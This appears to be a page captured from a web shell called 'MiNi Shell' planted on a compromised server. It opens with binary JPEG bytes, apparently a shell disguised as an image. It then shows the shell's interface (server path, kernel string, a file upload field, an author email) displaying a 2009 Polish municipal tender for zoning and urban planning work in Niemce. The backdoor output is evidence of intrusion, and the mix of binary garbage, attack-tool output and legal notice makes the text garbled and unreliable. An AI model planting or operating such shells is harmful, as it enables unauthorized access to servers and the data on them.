JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/23962-N-2009.html

<p class="kh_header"><b>Niemce: Opracowanie urbanistyczne projektów zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz zmian miejscowego planu zagospodarowania przestrzennego Gminy Niemce w zakresie wynikającym z uchwał Rady Gminy Niemce</b><br>
<b>Numer ogłoszenia: 23962 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Niemce , ul. Lubelska 121/202, 21-025 Niemce, woj. lubelskie, tel. 081 7561521, faks 081 7561790.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niemce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie urbanistyczne projektów zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz zmian miejscowego planu zagospodarowania przestrzennego Gminy Niemce w zakresie wynikającym z uchwał Rady Gminy Niemce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są opracowania urbanistyczne projektów zmiany  studium dla  terenu gminy Niemce (około 1252 wniosków), opracowanie zmian studium dla działek nr  602/2 i 878/7 położonych w miejscowości Dys oraz zmian planu zagospodarowania przestrzennego gminy Niemce dla działek 602/2 i 878/7 położonych w miejscowości Dys 
2. Przedmiot zamówienia  winien być wykonany zgodnie z obowiązującymi przepisami z uwzględnieniem wymogów określonych w rozporządzeniu Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania Gminy (Dz. U. Nr 118, poz .1233 z 2004r. oraz ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz 717 z 2003r. z późn. zm.).
3. Wymagana skala części graficznej studium 1:10 000. 
4.Przedmiot zamówienia w zakresie dotyczącym zmiany studium obejmuje:
1) przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzania projektu zmiany studium dla instytucji i organów właściwych do uzgodnienia i opiniowania (dot. uchwały Nr XXX/231/09 Rady Gminy Niemce z dnia 27stycznia 2009r. w sprawie przystąpienia do sporządzenia zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Niemce),
2) przygotowanie pełnej dokumentacji łącznie z przygotowaniem treści pisma o zawiadomieniu, ogłoszeniu, uzgodnieniu, uzasadnieniu, podsumowaniu  związanej ze strategiczną oceną oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U. Nr 199 z 2008r, poz 1227),  
3) sporządzenie projektu zmiany studium wraz z prognozą oddziaływania na środowisko, z uwzględnieniem ustaleń planu zagospodarowania przestrzennego województwa,
4) uzyskanie od Gminnej Komisji Urbanistyczno-Architektonicznej opinii o projekcie zmiany studium,
5) przygotowanie zawiadomień na piśmie do uzgodnienia i opiniowania projektu studium zgodnie z art.11 ust. 6,7,8 ustawy o planowaniu  i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz 717 z 2003r. z późn. zm.),
6) prezentację koncepcji projektu zmiany studium wraz z prognozą oddziaływania na środowisko władzom Gminy,
7) wprowadzenie zmian wynikających z uzyskanych opinii i dokonanych uzgodnień,
8) przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu zmiany studium wraz z prognozą oddziaływania na środowisko  do publicznego wglądu,
9) udział w dyskusjach publicznych nad przyjętymi rozwiązanymi w projekcie zmiany studium i w prognozie oddziaływania na środowisko,
10) analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu  projektu zmiany studium i prognozy oddziaływania na środowisko,
11) wprowadzenie zmian w projekcie zmiany studium, wynikających z rozpatrzenia ewentualnych uwag,
12) ewentualne ponowne uzgodnienie projektu zmiany studium w niezbędnych  zakresach,
13) przygotowanie projektu uchwały w sprawie zmiany studium warz z listą nieuwzględnionych uwag i przedstawienie go do uchwalenia przez Radzie Gminy,
14) przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących zmiany studium wraz z załącznikami , w celu oceny ich  zgodności z przepisami prawnymi przez Wojewodę .

5. Przedmiot zamówienia w zakresie dotyczącym projektu zmiany miejscowego planu zagospodarowania przestrzennego  określony jest w art.15 ust. 2 ustawy z dnia 27 marca  2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz 717 z 2003r. z późn. zm.), rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 z 2003r., poz 1587).
1) Zakres projektu zmiany miejscowego planu zagospodarowania przestrzennego obejmuje działki nr 602/2 i 878/7 położone w miejscowości  Dys obejmuje:
2) Wymagana skala części graficznej planu 1:1000,
3) przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzania projektu zmiany MPZP dla instytucji i organów właściwych do uzgodnienia i opiniowania,
4) przygotowanie pełnej dokumentacji łącznie z przygotowaniem treści pisma o zawiadomieniu, ogłoszeniu , uzgodnieniu  , uzasadnieniu, podsumowaniu  związanej ze strategiczną oceną oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz.U.Nr 199 z 2008r, poz 1227).
5) sporządzenie projektu zmiany planu wraz z prognozą oddziaływania na środowisko ,
6) uzyskanie od Gminnej Komisji Urbanistyczno-Architektonicznej opinii o projekcie zmiany MPZP,
7) prezentację koncepcji projektu zmiany MPZP wraz z prognozą oddziaływania na środowisko władzom Gminy,
8) sporządzenie prognoz skutków finansowych uchwalenia zmiany MPZP,
9) przygotowanie zawiadomień na piśmie do uzgodnienia i opiniowania projektu zmiany MPZP zgodnie z art.17, ust.6,7, ustawy o planowaniu  i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz 717 z 2003r. z późn. zm.),
10) uzyskanie  niezbędnych opinii i uzgodnień do projektu zmiany MPZP,
11) sporządzenie wniosków i uzyskanie zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne ,
12) wprowadzenie zmian do projektu zmiany MPZP wynikających z uzyskanych opinii i dokonanych uzgodnień ,
13) przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu zmiany MPZP wraz z prognozą oddziaływania na środowisko  do publicznego wglądu ,
14) udział w dyskusjach publicznych nad przyjętymi rozwiązanymi w projekcie zmiany MPZP i w prognozie oddziaływania na środowisko,
15) analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu  projektu zmiany MPZP i prognozy oddziaływania na środowisko,
16) wprowadzenie zmian w projekcie zmiany MPZP, wynikających z rozpatrzenia ewentualnych uwag,
17) ewentualne ponowne uzgodnienie projektu zmiany  MPZP w niezbędnych zakresach,
18) przygotowanie projektu uchwały w sprawie zmiany MPZP warz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Gminy,
19) przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących zmiany MPZP wraz z załącznikami, w celu oceny ich  zgodności z przepisami prawnymi przez Wojewodę.

6. Do czasu stwierdzenia przez Wojewodę zgodności zmiany planu i zmiany studium z przepisami prawnymi wszystkie czynności związane z obowiązkiem  sporządzenia zmiany planu i zmiany studium należą do wykonawcy.

7. Opracowania muszą zawierać część tekstową  i graficzną, uwzględniającą określenia wyszczególnione odpowiednio w art.10 i w art. 15 ust 2 i ust 3 z uwzględnieniem art. 16 ustawy z dnia 27 marca 2003r,. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z poźn. zm.).
Projekt MPZP musi być wykonany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 z 2003r. , poz 1587).
Projekt studium musi być wykony zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań  i kierunków zagospodarowania Gminy (Dz. U. Nr 118, poz .1233 z 2004r.). oraz ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz 717 z 2003r. z późn. zm.).
Zarówno projekt studium jak i projekt planu musi być wykonany zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz.U.Nr 199 z 2008r, poz 1227 ).

8. W przypadku wejścia w życie nowej ustawy o planowaniu i zagospodarowaniu przestrzennym w trakcie opracowania studium oraz planu, należy uwzględnić zasady i procedurę zgodnie obowiązującymi przepisami prawa.

9. Przedmiot zamówienia należy wykonać w wersji papierowej oraz w wersji elektronicznej na dostarczonym na nośniku CD, DVD. Załączniki graficzne należy wykonać w formatach  *.cdr dla wersji max 8.0, * .jpg. Dokumenty tekstowe w wersji elektronicznej należy wykonać w formatach *.doc i *.odt. 

10. Opracowania dotyczące zmian studium oraz planu zagospodarowania przestrzennego Wykonawca wykona w następującej ilości egzemplarzy:

Zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego:
1)	tekst zmiany studium 4 egz. oprawione + płyta CD
2)	rysunek zmiany studium w skali 1:10 000 4 egz.w kolorze  + płyta CD
3)	rysunek zmiany studium  czarno-biały , pomniejszony  do publikacji-4 egz
4)	prognoza oddziaływania na środowisko -4 egz oprawione +płyta CD
5)	rysunek zmiany studium w wersji umożliwiającej jego zamieszczenie na stronie internetowej Zmawiającego na nośniku CD

Zmiany miejscowego planu zagospodarowania przestrzennego:
1)	tekst zmiany planu -4 egz oprawione + płyta CD
2)	rysunek zmiany planu w skali 1:1000 -4egz w kolorze + płyta
3)	rysunek zmiany planu czarno-biały , pomniejszony do publikacji -4 egz
4)	rysunek zmiany planu w wersji umożliwiającej jego zamieszczenie na stronie  internetowej Zamawiającego na nośniku CD -1 egz
5)	prognoza oddziaływania na środowisko 4 egz oprawione +płyta CD
6)	prognoza skutków finansowych uchwalenia planu 4 egz oprawione + płyta CD.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 2500,00 zł przed upływem terminu składania ofert w jednej z form określonych w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm). 
	Przepis ten brzmi: 
art. 45 ust. 6 Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)	pieniądzu; 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kre?dytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

W przypadku wniesienia wadium w pieniądzu wykonawca wpłaca wadium przelewem na rachunek bankowy nr BS Niemce 29 8702 0001 0000 0026 2000 0050  z dopiskiem wadium na opracowanie urbanistyczne projektów zmian studium oraz planu zagospodarowania Gminy Niemce. Zamawiający postuluje załączenie do oferty potwierdzonej kopii dokumentu stwierdzającego dokonanie przelewu na rachunek bankowy zamawiającego. W przypadku wniesienia wadium w innej formie wykonawca załącza do oferty dokument stwierdzający wniesienie wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Udział w postępowaniu mogą wziąć wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy p.z.p., którzy :
1. zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 usługi o charakterze i zakresie odpowiadającym przedmiotowi zamówienia. Zrealizowane usługi muszą być potwierdzone odpowiednimi dokumentami od zleceniodawców o należytym ich wykonaniu
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków określonych w pkt 5.1. siwz zostanie przeprowadzona na zasadzie spełnia / nie spełnia w oparciu o złożone przez wykonawcę oświadczenia i dokumenty

Wykonawcy niespełniający warunków określonych w ustawie prawo zamówień publicznych oraz w niniejszej specyfikacji zostaną wykluczeni z postępowania.

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w art. 22 ust. 1 pkt 4 ustawy p.z.p. muszą być spełnione odrębnie przez każdego z wykonawców występujących wspólnie, natomiast w przypadku pozostałych warunków szczegółowych ( pkt 5.1.1. - 5.1.3. s.i.w.z.) wykonawcy występujący wspólnie muszą wykazać, że łącznie spełniają te warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków, o których mowa siwz do oferty należy dołączyć :
1) oświadczenie zgodne z art. 22 ust 1 ustawy p.z.p. wykonawcy o spełnianiu    warunków udziału w postępowaniu - wzór formularza oświadczenia stanowi załącznik nr 2 do s.i.w.z.;
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
4) polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
5) dokumenty stwierdzające, że osoba przewidziana na stanowisko głównego projektanta, posiada wymagane uprawnienia :
a) decyzja stwierdzająca posiadanie stosownych uprawnień projektowych;
b) aktualne zaświadczenia o wpisie na listę właściwej izby samorządu  zawodowego (Izba Urbanistów)
6) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - dotyczy osób wskazanych na stanowisko głównego projektanta - wg załącznika nr 4 do s.i.w.z.;
7) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, które będą uczestniczyć w wykonaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował,
8) wykaz wykonanych minimum 2 usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim charakterem i zakresem  przedmiotowi zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania z załączeniem dokumentów (referencji lub innych) potwierdzających, że roboty te wykonane zostały należycie - wg załącznika nr 5 do siwz;
9) potwierdzenie wpłaty wadium w kwocie wymaganej przez Zamawiającego. 

Dokumenty, o których mowa w pkt wyżej należy przedstawić w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. 

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy z wykonawców z osobna musi przedstawić oświadczenie w zakresie dotyczącym art. 22 ust. 1 (pkt 6.1.1. s.i.w.z.) i dokumenty wymienione w pkt 6.1.2. W takim przypadku muszą oni także ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty w formie oryginału lub notarialnie potwierdzonej kopii. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenia zamówienia, zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców, zgodnie z art. 23 p.z.p..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.niemce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Niemce
ul. Lubelska 121 
21-025 Niemce.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 10:00, miejsce: Urząd Gminy Niemce
ul. Lubelska 121
21-025 Niemce
sekretariat Urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com